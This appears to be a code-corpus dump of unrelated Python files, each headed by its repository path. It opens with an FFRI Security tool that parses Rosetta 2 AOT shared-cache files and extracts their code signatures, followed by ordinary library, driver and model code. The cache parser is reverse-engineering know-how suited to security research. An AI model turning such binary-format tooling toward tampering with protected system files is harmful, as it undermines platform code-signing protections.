# # (c) FFRI Security, Inc., 2021 / Author: FFRI Security, Inc. # import mmap import os from ctypes import Structure, c_uint32, c_uint64, sizeof from typing import Iterable, Optional, cast import typer app = typer.Typer() AOT_SHARED_CACHE_MAGIC = 0x6568636143746F41 def show_err(msg: str) -> None: typer.secho(msg, err=True, fg=typer.colors.RED) def show_warn(msg: str) -> None: typer.secho(msg, err=True, fg=typer.colors.YELLOW) def show_log(msg: str) -> None: typer.secho(msg, err=True, fg=typer.colors.GREEN) class AotMappingInfo(Structure): """ struct AotMappingInfo { uint64_t address; uint64_t size; uint64_t file_offset; uint32_t init_prot; uint32_t max_prot; }; """ _fields_ = ( ("address", c_uint64), ("size", c_uint64), ("file_offset", c_uint64), ("init_prot", c_uint32), ("max_prot", c_uint32), ) def __str__(self) -> str: return f"""\tAotMappingInfo: \t\taddress: {hex(self.address)} \t\tsize: {hex(self.size)} \t\tfile_offset: {hex(self.file_offset)} \t\tinit_prot: {hex(self.init_prot)} \t\tmax_prot: {hex(self.max_prot)} """ class AotSharedCacheHeader(Structure): """ struct AotSharedCacheHeader { uint64_t magic; uint64_t field_0x8; uint64_t field_0x10; uint64_t uuid[2]; uint64_t version[4]; uint64_t offset_to_codesig; uint64_t size_of_codesig; uint32_t n_entries; uint32_t offset_to_metadata_seg; struct AotMappingInfo mapping[3]; }; """ _fields_ = ( ("magic", c_uint64), ("field_0x8", c_uint64), ("field_0x10", c_uint64), ("uuid", c_uint64 * 2), ("version", c_uint64 * 4), ("offset_to_codesig", c_uint64), ("size_of_codesig", c_uint64), ("n_entries", c_uint32), ("offset_to_metadata_seg", c_uint32), ("mapping", AotMappingInfo * 3), ) def __str__(self) -> str: return f"""AotSharedCacheHeader: \tmagic: {hex(self.magic)} \tfield_0x8: {hex(self.field_0x8)} \tfield_0x10: {hex(self.field_0x10)} \tuuid: {[hex(self.uuid[i]) for i in range(2)]} \tversion: {[hex(self.version[i]) for i in range(4)]} \toffset_to_codesig: {hex(self.offset_to_codesig)} \tsize_of_codesig: {hex(self.size_of_codesig)} \tn_entries: {hex(self.n_entries)} \toffset_to_metadata_seg: {hex(self.offset_to_metadata_seg)} \tmapping:\n {''.join(str(self.mapping[i]) for i in range(3))}""" class CodeFragmentMetaData(Structure): _fields_ = ( ("type", c_uint32), ("offset_to_path_name", c_uint32), ("offset_to_x64_code", c_uint32), ("size_of_x64_code", c_uint32), ("offset_to_arm64_code", c_uint32), ("size_of_arm64_code", c_uint32), ("offset_to_branch_data", c_uint32), ("size_of_branch_data", c_uint32), ("offset_to_insn_map", c_uint32), ("size_of_insn_map", c_uint32), ) def __str__(self) -> str: return f"""CodeFragmentMetaData: \ttype: {hex(self.type)} \toffset_to_path_name: {hex(self.offset_to_path_name)} \toffset_to_x64_code: {hex(self.offset_to_x64_code)} \tsize_of_x64_code: {hex(self.size_of_x64_code)} \toffset_to_arm64_code: {hex(self.offset_to_arm64_code)} \tsize_of_arm64_code: {hex(self.size_of_arm64_code)} \toffset_to_branch_data: {hex(self.offset_to_branch_data)} \tsize_of_branch_data: {hex(self.size_of_branch_data)} \toffset_to_insn_map: {hex(self.offset_to_insn_map)} \tsize_of_insn_map: {hex(self.size_of_insn_map)}""" def load_aot_mapped_module_names(mapped_module_file: str) -> Optional[Iterable[str]]: if not os.path.exists(mapped_module_file): show_err(f"{mapped_module_file} does not exist") return None with open(mapped_module_file, "r") as fin: for line in fin.readlines(): yield line.strip() @app.command() def extract_codesig(aot_shared_cache_path: str, output_file_path: str) -> None: if not os.path.exists(aot_shared_cache_path): show_err(f"{aot_shared_cache_path} does not exist") return with open(aot_shared_cache_path, "r+b") as fin: mm = mmap.mmap(fin.fileno(), 0) header = AotSharedCacheHeader.from_buffer_copy( cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0 ) if header.magic != AOT_SHARED_CACHE_MAGIC: show_err("magic should be AotCache") return codesig_beg = header.offset_to_codesig codesig_end = codesig_beg + header.size_of_codesig show_log(f"Will extract a code signature located at [{hex(codesig_beg)}, {hex(codesig_end)}]") with open(output_file_path, "wb") as fout: fout.write(cast(bytes, mm[codesig_beg:codesig_end])) show_log(f"The extracted code signature is saved to {output_file_path}") @app.command() def dump(aot_shared_cache_path: str) -> None: if not os.path.exists(aot_shared_cache_path): show_err(f"{aot_shared_cache_path} does not exist") return if ( mapped_module_names := load_aot_mapped_module_names("aot_mapped_module_names") ) is None: return with open(aot_shared_cache_path, "r+b") as fin: mm = mmap.mmap(fin.fileno(), 0) header = AotSharedCacheHeader.from_buffer_copy( cast(bytes, mm[0:sizeof(AotSharedCacheHeader)]), 0 ) if header.magic != AOT_SHARED_CACHE_MAGIC: show_err("magic should be AotCache") return typer.echo(header) aot_seg_beg = header.mapping[2].file_offset metadata_seg_beg = header.offset_to_metadata_seg typer.echo(f"metadata segment starts from {hex(metadata_seg_beg)}") cur_seek = header.offset_to_metadata_seg typer.echo(f"number of entries is {header.n_entries}") for _ in range(header.n_entries): entry = CodeFragmentMetaData.from_buffer_copy( cast(bytes, mm[cur_seek : cur_seek + sizeof(CodeFragmentMetaData)]) ) typer.echo(entry) cur_seek += sizeof(CodeFragmentMetaData) if entry.type == 0: if cur_seek != metadata_seg_beg + entry.offset_to_branch_data: show_err("branch data does not follow") show_err( f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_branch_data)}" ) return branch_data_beg, branch_data_end = cur_seek, cur_seek + entry.size_of_branch_data cur_seek += entry.size_of_branch_data if cur_seek != metadata_seg_beg + entry.offset_to_insn_map: show_err("instruction map data does not follow") show_err( f"{hex(cur_seek)} {hex(metadata_seg_beg)} {hex(entry.offset_to_insn_map)}" ) return insn_map_beg, insn_map_end = cur_seek, cur_seek + entry.size_of_insn_map cur_seek += entry.size_of_insn_map arm64_code_beg = aot_seg_beg + entry.offset_to_arm64_code cache_code_end = arm64_code_beg + entry.size_of_arm64_code typer.echo( f"[{hex(arm64_code_beg)}, {hex(cache_code_end)}] {next(mapped_module_names)}" ) typer.echo( f"\tbranch data: [{hex(branch_data_beg)}, {hex(branch_data_end)}]" ) typer.echo( f"\tinstruction map: [{hex(insn_map_beg)}, {hex(insn_map_end)}]" ) elif entry.type == 1: runtime_begin = aot_seg_beg + entry.offset_to_arm64_code runtime_end = runtime_begin + entry.size_of_arm64_code typer.echo( f"[{hex(runtime_begin)}, {hex(runtime_end)}] RuntimeRoutines" ) else: show_err(f"Unknown CodeSegmentMetadata entry ({hex(entry.type)})") return if __name__ == "__main__": app()
sfaira/versions/genomes/__init__.py
theislab/sfaira
110
12728471
from .genomes import GenomeContainer, GtfInterface from .utils import translate_id_to_symbols, translate_symbols_to_id
moe/__init__.py
misokg/Cornell-MOE
218
12728560
<gh_stars>100-1000 # -*- coding: utf-8 -*- #: Following the versioning system at http://semver.org/ #: See also docs/contributing.rst, section ``Versioning`` #: MAJOR: incremented for incompatible API changes MAJOR = 1 #: MINOR: incremented for adding functionality in a backwards-compatible manner MINOR = 0 #: PATCH: incremented for backward-compatible bug fixes and minor capability improvements PATCH = 0 #: Latest release version of MOE __version__ = "{0:d}.{1:d}.{2:d}".format(MAJOR, MINOR, PATCH)
mle_monitor/protocol/tables.py
mle-infrastructure/mle-monitor
107
12728581
<filename>mle_monitor/protocol/tables.py<gh_stars>100-1000 import pandas as pd from datetime import datetime from rich import box from rich.table import Table from rich.spinner import Spinner from rich.console import Console from rich.align import Align from rich.progress import ( BarColumn, Progress, TextColumn, ) def protocol_summary( db, all_experiment_ids, tail: int = 5, verbose: bool = True, full: bool = False ): """Construct a summary dataframe of previous experiments.""" # Set pandas df format option to print pd.set_option("display.max_columns", 5) pd.set_option("max_colwidth", 30) if len(all_experiment_ids) > 0: purposes, project_names, exp_paths = [], [], [] num_seeds, statuses, start_times, experiment_types = [], [], [], [] resource, num_cpus, num_gpus, total_jobs, completed_jobs = [], [], [], [], [] if tail is None: tail = len(all_experiment_ids) # Loop over experiment ids and extract data to retrieve for int_e_id in all_experiment_ids[-tail:]: e_id = str(int_e_id) purposes.append(db.dget(e_id, "purpose")) project_names.append(db.dget(e_id, "project_name")) exp_paths.append(db.dget(e_id, "experiment_dir")) statuses.append(db.dget(e_id, "job_status")) start_times.append(db.dget(e_id, "start_time")) resource.append(db.dget(e_id, "exec_resource")) num_seeds.append(db.dget(e_id, "num_seeds")) num_cpus.append(db.dget(e_id, "num_cpus")) num_gpus.append(db.dget(e_id, "num_gpus")) experiment_types.append(db.dget(e_id, "experiment_type")) total_jobs.append(db.dget(e_id, "num_total_jobs")) completed_jobs.append(db.dget(e_id, "completed_jobs")) d = { "ID": [str(e_id) for e_id in all_experiment_ids[-tail:]], "Date": start_times, "Project": project_names, "Purpose": purposes, "Experiment Dir": exp_paths, "Status": statuses, "Seeds": num_seeds, "Resource": resource, "CPUs": num_cpus, "GPUs": num_gpus, "Type": experiment_types, "Jobs": total_jobs, "Completed Jobs": completed_jobs, } df = pd.DataFrame(d) df["Date"] = df["Date"].map("{:.5}".format) df["Purpose"] = df["Purpose"].map("{:.30}".format) # Print a nice table overview (no job resources) if verbose: Console().print(Align.left(protocol_table(df, full))) return df else: if verbose: time_t = datetime.now().strftime("%m/%d/%Y %I:%M:%S %p") print(time_t, "No previously recorded experiments") return None def get_progress_bar(total_jobs: int, completed_jobs: int): progress = Progress( TextColumn( "{task.completed:^3.0f}/{task.total:^3.0f}", justify="left", style="white" ), BarColumn(bar_width=10, style="red"), TextColumn("[progress.percentage]{task.percentage:>3.0f}%", style="white"), auto_refresh=False, ) task = progress.add_task("queue", total=total_jobs) progress.update(task, completed=completed_jobs, refresh=True) return progress def protocol_table(df, full: bool = True): """Generate pretty table of experiment protocol db - preselected db.""" table = Table(show_header=True, show_footer=False, header_style="bold blue") table.add_column(":bookmark:", justify="center") table.add_column(":id:", justify="center") table.add_column(":spiral_calendar:", justify="center") table.add_column("Project") table.add_column("Purpose") table.add_column("Type") table.add_column("[yellow]:arrow_forward:", justify="center") table.add_column("[yellow]:recycle:", justify="center") table.add_column("CPU", justify="center") table.add_column("GPU", justify="center") # Full option prints also resource requirements of jobs if full: table.add_column( ":hourglass_flowing_sand: Completed Jobs [yellow]:heavy_check_mark:", justify="center", ) # Add rows of info if dataframe exists (previously recorded experiments) if df is not None: for index in reversed(df.index): row = df.iloc[index] if row["Resource"] == "sge-cluster": resource = "SGE" elif row["Resource"] == "slurm-cluster": resource = "Slurm" elif row["Resource"] == "gcp-cloud": resource = "GCP" else: resource = "Local" if row["Type"] == "hyperparameter-search": exp_type = "search" elif row["Type"] == "multiple-configs": exp_type = "config" elif row["Type"] == "single-config": exp_type = "single" else: exp_type = row["Type"] if row["Status"] == "running": status = Spinner("dots", style="magenta") elif row["Status"] == "completed": status = "[green]:heavy_check_mark:" else: status = "[red]:heavy_multiplication_x:" if full: bar = get_progress_bar(int(row["Jobs"]), int(row["Completed Jobs"])) table.add_row( status, row["ID"], row["Date"], row["Project"][:10], row["Purpose"][:15], exp_type, resource, str(row["Seeds"]), str(row["CPUs"]), str(row["GPUs"]), bar, ) else: table.add_row( status, row["ID"], row["Date"], row["Project"][:10], row["Purpose"][:25], exp_type, resource, str(row["Seeds"]), str(row["CPUs"]), str(row["GPUs"]), ) table.border_style = "blue" table.box = box.SIMPLE_HEAD return table
src/agent/kubernetes-agent/src/network/__init__.py
hyperledger-gerrit-archive/cello
865
12728602
<filename>src/agent/kubernetes-agent/src/network/__init__.py # # SPDX-License-Identifier: Apache-2.0 # from .fabric import FabricNetwork
src/livestreamer/packages/flashmedia/error.py
jaccarmac/livestreamer
3,614
12728648
<reponame>jaccarmac/livestreamer<filename>src/livestreamer/packages/flashmedia/error.py<gh_stars>1000+ #!/usr/bin/env python class FLVError(Exception): pass class F4VError(Exception): pass class AMFError(Exception): pass __all__ = ["FLVError", "F4VError", "AMFError"]
src/model/paf_model.py
ParikhKadam/part-affinity
110
12728668
import torch.nn as nn from .helper import init, make_standard_block import torch class PAFModel(nn.Module): def __init__(self, backend, backend_outp_feats, n_joints, n_paf, n_stages=7): super(PAFModel, self).__init__() assert (n_stages > 0) self.backend = backend stages = [Stage(backend_outp_feats, n_joints, n_paf, True)] for i in range(n_stages - 1): stages.append(Stage(backend_outp_feats, n_joints, n_paf, False)) self.stages = nn.ModuleList(stages) def forward(self, x): img_feats = self.backend(x) cur_feats = img_feats heatmap_outs = [] paf_outs = [] for i, stage in enumerate(self.stages): heatmap_out, paf_out = stage(cur_feats) heatmap_outs.append(heatmap_out) paf_outs.append(paf_out) cur_feats = torch.cat([img_feats, heatmap_out, paf_out], 1) return heatmap_outs, paf_outs class Stage(nn.Module): def __init__(self, backend_outp_feats, n_joints, n_paf, stage1): super(Stage, self).__init__() inp_feats = backend_outp_feats if stage1: self.block1 = make_paf_block_stage1(inp_feats, n_joints) self.block2 = make_paf_block_stage1(inp_feats, n_paf) else: inp_feats = backend_outp_feats + n_joints + n_paf self.block1 = make_paf_block_stage2(inp_feats, n_joints) self.block2 = make_paf_block_stage2(inp_feats, n_paf) init(self.block1) init(self.block2) def forward(self, x): y1 = self.block1(x) y2 = self.block2(x) return y1, y2 def make_paf_block_stage1(inp_feats, output_feats): layers = [make_standard_block(inp_feats, 128, 3), make_standard_block(128, 128, 3), make_standard_block(128, 128, 3), make_standard_block(128, 512, 1, 1, 0)] layers += [nn.Conv2d(512, output_feats, 1, 1, 0)] return nn.Sequential(*layers) def make_paf_block_stage2(inp_feats, output_feats): layers = [make_standard_block(inp_feats, 128, 7, 1, 3), make_standard_block(128, 128, 7, 1, 3), make_standard_block(128, 128, 7, 1, 3), make_standard_block(128, 128, 7, 1, 3), make_standard_block(128, 128, 7, 1, 3), make_standard_block(128, 128, 1, 1, 0)] layers += [nn.Conv2d(128, output_feats, 1, 1, 0)] return nn.Sequential(*layers)
atcoder/abc099/b.py
Ashindustry007/competitive-programming
506
12728674
<gh_stars>100-1000 #!/usr/bin/env python3 # https://abc099.contest.atcoder.jp/tasks/abc099_b a, b = map(int, input().split()) d = b - a k = d * (d - 1) // 2 print(k - a)
convert.py
onlyrico/RepMLP
220
12728709
import argparse import os import torch from repmlpnet import * parser = argparse.ArgumentParser(description='RepMLPNet Conversion') parser.add_argument('load', metavar='LOAD', help='path to the source weights file') parser.add_argument('save', metavar='SAVE', help='path to the target weights file') parser.add_argument('-a', '--arch', metavar='ARCH', default='RepMLPNet-B224') def convert(): args = parser.parse_args() if args.arch == 'RepMLPNet-B224': model = create_RepMLPNet_B224(deploy=False) elif args.arch == 'RepMLPNet-B256': model = create_RepMLPNet_B256(deploy=False) else: raise ValueError('TODO') if os.path.isfile(args.load): print("=> loading checkpoint '{}'".format(args.load)) checkpoint = torch.load(args.load, map_location='cpu') if 'state_dict' in checkpoint: checkpoint = checkpoint['state_dict'] elif 'model' in checkpoint: checkpoint = checkpoint['model'] ckpt = {k.replace('module.', ''): v for k, v in checkpoint.items()} # strip the names print(ckpt.keys()) model.load_state_dict(ckpt) else: print("=> no checkpoint found at '{}'".format(args.load)) model.locality_injection() torch.save(model.state_dict(), args.save) if __name__ == '__main__': convert()
env/Lib/site-packages/OpenGL/GLES2/ANGLE/pack_reverse_row_order.py
5gconnectedbike/Navio2
210
12728716
'''OpenGL extension ANGLE.pack_reverse_row_order This module customises the behaviour of the OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order to provide a more Python-friendly API Overview (from the spec) This extension introduces a mechanism to allow reversing the order in which image rows are written into a pack destination. This effectively allows an application to flip the results of a ReadPixels in the y direction operation without having to render upside down. The coordinate system of OpenGL is vertically reversed in comparison to a number of other graphics systems such as native windowing APIs. Applications that perform ReadPixels may have to either render to an intermediate color buffer before calling ReadPixels or perform a flip in software after ReadPixels. In some systems the GL can perform the row reversal during ReadPixels without incurring additional cost. The official definition of this extension is available here: http://www.opengl.org/registry/specs/ANGLE/pack_reverse_row_order.txt ''' from OpenGL import platform, constant, arrays from OpenGL import extensions, wrapper import ctypes from OpenGL.raw.GLES2 import _types, _glgets from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import * from OpenGL.raw.GLES2.ANGLE.pack_reverse_row_order import _EXTENSION_NAME def glInitPackReverseRowOrderANGLE(): '''Return boolean indicating whether this extension is available''' from OpenGL import extensions return extensions.hasGLExtension( _EXTENSION_NAME ) ### END AUTOGENERATED SECTION
vedastr/models/bodies/rectificators/registry.py
csmasters/vedastr
475
12728758
from vedastr.utils import Registry RECTIFICATORS = Registry('Rectificator')
python/samples/st7735s.py
robn/spidriver
142
12728793
<reponame>robn/spidriver<gh_stars>100-1000 #!/usr/bin/env python3 # coding=utf-8 import array import getopt import struct import sys import time from PIL import Image from spidriver import SPIDriver # Pure Python rgb to 565 encoder for portablity def as565(im): rr, gg, bb = [list(c.getdata()) for c in im.convert("RGB").split()] def s(x, n): return x * (2 ** n - 1) // 255 d565 = [(s(b, 5) << 11) | (s(g, 6) << 5) | s(r, 5) for (r,g,b) in zip(rr, gg, bb)] d565h = array.array('H', d565) d565h.byteswap() return array.array('B', d565h.tostring()) NOP = 0x00 SWRESET = 0x01 RDDID = 0x04 RDDST = 0x09 SLPIN = 0x10 SLPOUT = 0x11 PTLON = 0x12 NORON = 0x13 INVOFF = 0x20 INVON = 0x21 DISPOFF = 0x28 DISPON = 0x29 CASET = 0x2A RASET = 0x2B RAMWR = 0x2C RAMRD = 0x2E PTLAR = 0x30 COLMOD = 0x3A MADCTL = 0x36 FRMCTR1 = 0xB1 FRMCTR2 = 0xB2 FRMCTR3 = 0xB3 INVCTR = 0xB4 DISSET5 = 0xB6 PWCTR1 = 0xC0 PWCTR2 = 0xC1 PWCTR3 = 0xC2 PWCTR4 = 0xC3 PWCTR5 = 0xC4 VMCTR1 = 0xC5 RDID1 = 0xDA RDID2 = 0xDB RDID3 = 0xDC RDID4 = 0xDD PWCTR6 = 0xFC GMCTRP1 = 0xE0 GMCTRN1 = 0xE1 DELAY = 0x80 class ST7735: def __init__(self, sd): self.sd = sd self.sd.unsel() def write(self, a, c): self.sd.seta(a) self.sd.sel() self.sd.write(c) self.sd.unsel() def writeCommand(self, cc): self.write(0, struct.pack("B", cc)) def writeData(self, c): self.write(1, c) def writeData1(self, cc): self.writeData(struct.pack("B", cc)) def cmd(self, cc, args=()): self.writeCommand(cc) n = len(args) if n != 0: self.writeData(struct.pack(str(n) + "B", *args)) def setAddrWindow(self, x0, y0, x1, y1): self.writeCommand(CASET) # Column addr set self.writeData(struct.pack(">HH", x0, x1)) self.writeCommand(RASET) # Row addr set self.writeData(struct.pack(">HH", y0, y1)) self.writeCommand(RAMWR) # write to RAM def rect(self, x, y, w, h, color): self.setAddrWindow(x, y, x + w - 1, y + h - 1) self.writeData(w * h * struct.pack(">H", color)) def start(self): self.sd.setb(0) time.sleep(.001) self.sd.setb(1) time.sleep(.001) self.cmd(SWRESET) # Software reset, 0 args, w/delay time.sleep(.180) self.cmd(SLPOUT) # Out of sleep mode, 0 args, w/delay time.sleep(.180) commands = [ (FRMCTR1, ( # Frame rate ctrl - normal mode 0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D) (FRMCTR2, ( # Frame rate control - idle mode 0x01, 0x2C, 0x2D)), # Rate = fosc/(1x2+40) * (LINE+2C+2D) (FRMCTR3, ( # Frame rate ctrl - partial mode 0x01, 0x2C, 0x2D, # Dot inversion mode 0x01, 0x2C, 0x2D)), # Line inversion mode (PWCTR1, ( # Power control 0xA2, 0x02, # -4.6V 0x84)), # AUTO mode (PWCTR2, ( # Power control 0xC5,)), # VGH25 = 2.4C VGSEL = -10 VGH = 3 * AVDD (PWCTR3, ( # Power control 0x0A, # Opamp current small 0x00)), # Boost frequency (PWCTR4, ( # Power control 0x8A, # BCLK/2, Opamp current small & Medium low 0x2A)), (PWCTR5, ( # Power control 0x8A, 0xEE)), (VMCTR1, ( # VCOM control 0x0E,)), (MADCTL, ( # Memory access control (directions) 0xC8,)), # row addr/col addr, bottom to top refresh (COLMOD, ( # set color mode 0x05,)), # 16-bit color (GMCTRP1, ( # Gamma + polarity Correction Characterstics 0x02, 0x1c, 0x07, 0x12, 0x37, 0x32, 0x29, 0x2d, 0x29, 0x25, 0x2B, 0x39, 0x00, 0x01, 0x03, 0x10)), (GMCTRN1, ( # Gamma - polarity Correction Characterstics 0x03, 0x1d, 0x07, 0x06, 0x2E, 0x2C, 0x29, 0x2D, 0x2E, 0x2E, 0x37, 0x3F, 0x00, 0x00, 0x02, 0x10)), (NORON, ()), # Normal display on (DISPON, ()), # Main screen turn on ] for c, args in commands: self.cmd(c, args) def clear(self): self.rect(0, 0, 128, 160, 0x0000) def loadimage(self, a): im = Image.open(a) if im.size[0] > im.size[1]: im = im.transpose(Image.ROTATE_90) w = 160 * im.size[0] // im.size[1] im = im.resize((w, 160), Image.ANTIALIAS) (w, h) = im.size if w > 128: im = im.crop((w // 2 - 64, 0, w // 2 + 64, 160)) elif w < 128: c = Image.new("RGB", (128, 160)) c.paste(im, (64 - w // 2, 0)) im = c st.setAddrWindow(0, 0, 127, 159) st.writeData(as565(im.convert("RGB"))) if __name__ == '__main__': try: optlist, args = getopt.getopt(sys.argv[1:], "h:") except getopt.GetoptError as reason: print() print('usage: st7735 [ -h device ] image...') print() print() sys.exit(1) optdict = dict(optlist) st = ST7735(SPIDriver(optdict.get('-h', "/dev/ttyUSB0"))) st.start() st.clear() for a in args: st.loadimage(a)
napari/_tests/test_multiple_viewers.py
MaksHess/napari
1,345
12728827
from napari import Viewer def test_multi_viewers_dont_clash(qapp): v1 = Viewer(show=False, title='v1') v2 = Viewer(show=False, title='v2') assert not v1.grid.enabled assert not v2.grid.enabled v1.window.activate() # a click would do this in the actual gui v1.window._qt_viewer.viewerButtons.gridViewButton.click() assert not v2.grid.enabled assert v1.grid.enabled v1.close() v2.close()
src/lockmgr.py
anbo225/docklet
273
12728833
#!/usr/bin/python3 ''' This module is the manager of threadings locks. A LockMgr manages multiple threadings locks. ''' import threading class LockMgr: def __init__(self): # self.locks will store multiple locks by their names. self.locks = {} # the lock of self.locks, is to ensure that only one thread can update it at the same time self.locks_lock = threading.Lock() # acquire a lock by its name def acquire(self, lock_name): self.locks_lock.acquire() if lock_name not in self.locks.keys(): self.locks[lock_name] = threading.Lock() self.locks_lock.release() self.locks[lock_name].acquire() return # release a lock by its name def release(self, lock_name): if lock_name not in self.locks.keys(): return self.locks[lock_name].release() return
aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py
yndu13/aliyun-openapi-python-sdk
1,001
12728850
<filename>aliyun-python-sdk-cloudphoto/aliyunsdkcloudphoto/__init__.py __version__ = "1.1.19"
python/src/converters/__init__.py
vvucetic/keyvi
199
12728857
<reponame>vvucetic/keyvi from .pykeyvi_autowrap_conversion_providers import * from autowrap.ConversionProvider import special_converters def register_converters(): special_converters.append(MatchIteratorPairConverter())
openmmtools/data/benzene-toluene-implicit/generate-molecules.py
sroet/openmmtools
135
12728859
#!/usr/bin/env python """ Generate molecules for test system using OpenEye tools. """ molecules = { 'BEN' : 'benzene', 'TOL' : 'toluene' } from openeye import oechem from openeye import oeomega from openeye import oeiupac from openeye import oequacpac # Create molecules. for resname in molecules: name = molecules[resname] print(name) # Create molecule from IUPAC name. molecule = oechem.OEMol() oeiupac.OEParseIUPACName(molecule, name) molecule.SetTitle(name) # Normalize molecule. oechem.OEAddExplicitHydrogens(molecule) oechem.OETriposAtomNames(molecule) oechem.OEAssignAromaticFlags(molecule, oechem.OEAroModelOpenEye) # Create configuration. omega = oeomega.OEOmega() omega.SetStrictStereo(True) omega.SetIncludeInput(False) omega(molecule) # Create charges. oequacpac.OEAssignPartialCharges(molecule, oequacpac.OECharges_AM1BCCSym) # Write molecule. filename = '%s.tripos.mol2' % name print(filename) ofs = oechem.oemolostream() ofs.open(filename) oechem.OEWriteMolecule(ofs, molecule) ofs.close() # Replace <0> with resname. infile = open(filename, 'r') lines = infile.readlines() infile.close() newlines = [line.replace('<0>', resname) for line in lines] outfile = open(filename, 'w') outfile.writelines(newlines) outfile.close()
src/research/dynamic/dynamic_test.py
mzy2240/GridCal
284
12728889
from GridCal.Engine.calculation_engine import * from GridCal.Engine.Simulations.Dynamics.dynamic_modules import * grid = MultiCircuit() # grid.load_file('lynn5buspv.xlsx') grid.load_file('IEEE30.xlsx') grid.compile() circuit = grid.circuits[0] options = PowerFlowOptions(SolverType.NR, verbose=False, robust=False, tolerance=1e-9) power_flow = PowerFlow(grid, options) power_flow.run() dynamic_devices = circuit.get_generators() bus_indices = [circuit.buses_dict[elm.bus] for elm in dynamic_devices] res = dynamic_simulation(n=len(circuit.buses), Vbus=power_flow.results.voltage, Sbus=circuit.power_flow_input.Sbus, Ybus=circuit.power_flow_input.Ybus, Sbase=circuit.Sbase, fBase=50, t_sim=50, h=0.001, dynamic_devices=dynamic_devices, bus_indices=bus_indices) from matplotlib import pyplot as plt plt.figure() plt.plot(res.time, abs(res.voltage), linewidth=1) plt.title('Generator voltages') plt.figure() plt.plot(res.time, abs(res.omegas), linewidth=1) plt.title('Angular speeds') plt.show()
src/titiler/core/titiler/core/resources/responses.py
obaid585/rastertile
288
12728924
<gh_stars>100-1000 """Common response models.""" from typing import Any import simplejson as json from starlette import responses class XMLResponse(responses.Response): """XML Response""" media_type = "application/xml" class JSONResponse(responses.JSONResponse): """Custom JSON Response.""" def render(self, content: Any) -> bytes: """Render JSON. Same defaults as starlette.responses.JSONResponse.render but allow NaN to be replaced by null using simplejson """ return json.dumps( content, ensure_ascii=False, allow_nan=False, indent=None, ignore_nan=True, separators=(",", ":"), ).encode("utf-8") class GeoJSONResponse(JSONResponse): """GeoJSON Response""" media_type = "application/geo+json"
python/mxnet/_ffi/function.py
mchoi8739/incubator-mxnet
211
12728934
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, unused-import """ Function namespace. Acknowledgement: This file originates from incubator-tvm """ import os import sys import ctypes from ..base import _LIB, check_call from .base import py_str, c_str try: if int(os.environ.get("MXNET_ENABLE_CYTHON", True)) == 0: from ._ctypes.function import FunctionBase as _FunctionBase # To set RETURN_SWITCH for OBJECT_HANDLE from . import object else: from ._cy3.core import FunctionBase as _FunctionBase except ImportError: if int(os.environ.get("MXNET_ENFORCE_CYTHON", False)) != 0: raise ImportError("Cython Module cannot be loaded but MXNET_ENFORCE_CYTHON=1") from ._ctypes.function import FunctionBase as _FunctionBase # To set RETURN_SWITCH for OBJECT_HANDLE from . import object FunctionHandle = ctypes.c_void_p class Function(_FunctionBase): """The PackedFunc object used in TVM. Function plays an key role to bridge front and backend in TVM. Function provide a type-erased interface, you can call function with positional arguments. The compiled module returns Function. TVM backend also registers and exposes its API as Functions. For example, the developer function exposed in tvm.ir_pass are actually C++ functions that are registered as PackedFunc The following are list of common usage scenario of tvm.Function. - Automatic exposure of C++ API into python - To call PackedFunc from python side - To call python callbacks to inspect results in generated code - Bring python hook into C++ backend See Also -------- tvm.register_func: How to register global function. tvm.get_global_func: How to get global function. """ def get_global_func(name, allow_missing=False): """Get a global function by name Parameters ---------- name : str The name of the global function allow_missing : bool Whether allow missing function or raise an error. Returns ------- func : tvm.Function The function to be returned, None if function is missing. """ handle = FunctionHandle() check_call(_LIB.MXNetFuncGetGlobal(c_str(name), ctypes.byref(handle))) if handle.value: return Function(handle, False) if allow_missing: return None raise ValueError("Cannot find global function %s" % name) def list_global_func_names(): """Get list of global functions registered. Returns ------- names : list List of global functions names. """ plist = ctypes.POINTER(ctypes.c_char_p)() size = ctypes.c_uint() check_call(_LIB.MXNetFuncListGlobalNames(ctypes.byref(size), ctypes.byref(plist))) fnames = [] for i in range(size.value): fnames.append(py_str(plist[i])) return fnames def _get_api(f): flocal = f flocal.is_global = True return flocal def _init_api(namespace, target_module_name=None): """Initialize api for a given module name namespace : str The namespace of the source registry target_module_name : str The target module name if different from namespace """ target_module_name = ( target_module_name if target_module_name else namespace) if namespace.startswith("mxnet."): _init_api_prefix(target_module_name, namespace[6:]) else: _init_api_prefix(target_module_name, namespace) def _init_api_prefix(module_name, prefix): module = sys.modules[module_name] for name in list_global_func_names(): if prefix == "api": fname = name if name.startswith("_"): target_module = sys.modules["mxnet._api_internal"] else: target_module = module else: if not name.startswith(prefix): continue fname = name[len(prefix)+1:] target_module = module if fname.find(".") != -1: continue f = get_global_func(name) ff = _get_api(f) ff.__name__ = fname ff.__doc__ = ("MXNet PackedFunc %s. " % fname) setattr(target_module, ff.__name__, ff)
tests/pytests/functional/states/test_npm.py
markgras/salt
9,425
12728956
